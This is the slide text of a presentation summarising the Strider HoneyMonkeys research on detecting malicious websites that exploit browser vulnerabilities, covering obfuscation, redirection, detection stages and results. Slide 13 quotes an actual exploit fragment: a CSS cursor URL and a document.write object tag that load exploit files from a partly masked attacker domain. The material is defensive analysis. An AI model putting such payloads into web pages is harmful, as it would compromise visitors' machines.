Download presentation
Presentation is loading. Please wait.
Published bySelina Wheatley Modified over 9 years ago
1
Automated Web Patrol with Strider Honey Monkeys: Finding Web Sites That Exploit Browser Vulnerabilities AUTHORS: Yi-Min Wang, Doug Beck, Xuxian Jiang, Roussi Roussev, Chad Verbowski, Shuo Chen, and Sam King PUBLISHED IN: MICROSOFT RESEARCH,Redmond
2
EMERGING ATTACK : INTERNET ATTACKS BY MALICIOUS WEBSITE EXPLOIT BROWSER VULNERABILITIES INSTALL MALICIOUS CONTENTS USE OF HONEYMONKEYS FOR SOLUTION PROPOSED PROBLEM
3
BROWSER BASED VULNERABILITY Code Obfuscation URL redirection Vulnerability exploitation Malware installation
4
CODE OBFUSCATION
5
To escape from signature based scanning Custom decoding routine included inside the script Unreadable long strings that are encoded and decoded later by the script or by the browser
6
ENCODED MALICIOUS CODE
7
DECODED MALICIOUS CODE
8
URL REDIRECTION
9
PRIMARY URL TO SECONDARY URL PROTOCOL REDIRECTION USING HTTP 302 TEMPORARY REDIRECT HTML TAGS Script functions including w indow.location.replace().
10
URL REDIRECTION PRIMARY SECONDARY USER http://[IP address] /[8 chars]/test2/iejp.htm http://[IP address]
11
VULNERABILITY EXPLOITATION
12
Malicious Website attempt to exploit multiple vulnerabilities HTML fragment – multiple files from different URL’S Dynamic code injection using Document.write Trojan downloader works after exploits Most attacked browser is IE
13
EXAMPLE FOR VULNERABILITY * {CURSOR: url("http://vxxxxxxe.biz/adverts/033/sploit.anr")} Try{ document.write('<object data=`ms-its:mht 09l:file:// C:\fo'+'o.mht!'+'http://vxxxx'+'xxe.biz//adv'+'erts//033//targ.ch'+'m::/ta rg'+'et.htm` type=`text/x-scriptlet`> '); }catch(e){} Exploit 1 Exploit 2 Exploit 3
14
Honey Monkey Exploit Detection System Active client side virtual machines called honeypots Large scale, systematic and automated web patrol It mimics human browsing Different patches and different levels of vulnerability
15
HONEYMONKEY SYSTEM Stage 1 – scalable mode by visiting N- URLs. Stage 2 – perform recursive redirected analysis. Stage 3 – scan exploit URLs using fully patched VMs.
16
HONEY MONKEY SYSTEM
17
TOPOLOGY GRAPH AND NODE RANKING Rectangular nodes represent Exploit URL’s Arrows represent traffic redirection Circles represent nodes that act as an aggregation point for exploit pages hosted R is the most likely exploit provider
18
TOPOLOGY GRAPH AND NODE RANKING
19
GENERATING URL LISTS Generating URL LISTS - Suspicious URL’s - Popular websites – if attacked potentially attack larger population - Localized space websites
20
Exploit Detection Report Executable files created or modified outside the browser sandbox folders Processes created Windows registry entry created or modified Vulnerability exploited Redirect URL visited
21
Patch level statistics
22
RESULTS
24
ADVANTAGES Automatic Scalable Non-signature based approach Stage-wise detection
25
DISADVANTGES Exploiters may randomize the attack confusing the honey monkeys Exploiters were able to detect honey monkeys by sending dialog box They didn’t explain about topology graphs very clearly
26
IMPROVEMENTS They need to work on accuracy They need more classification according to contents They should improve on avoiding detection by the honey monkeys
Similar presentations
© 2025 SlidePlayer.com. Inc.
All rights reserved.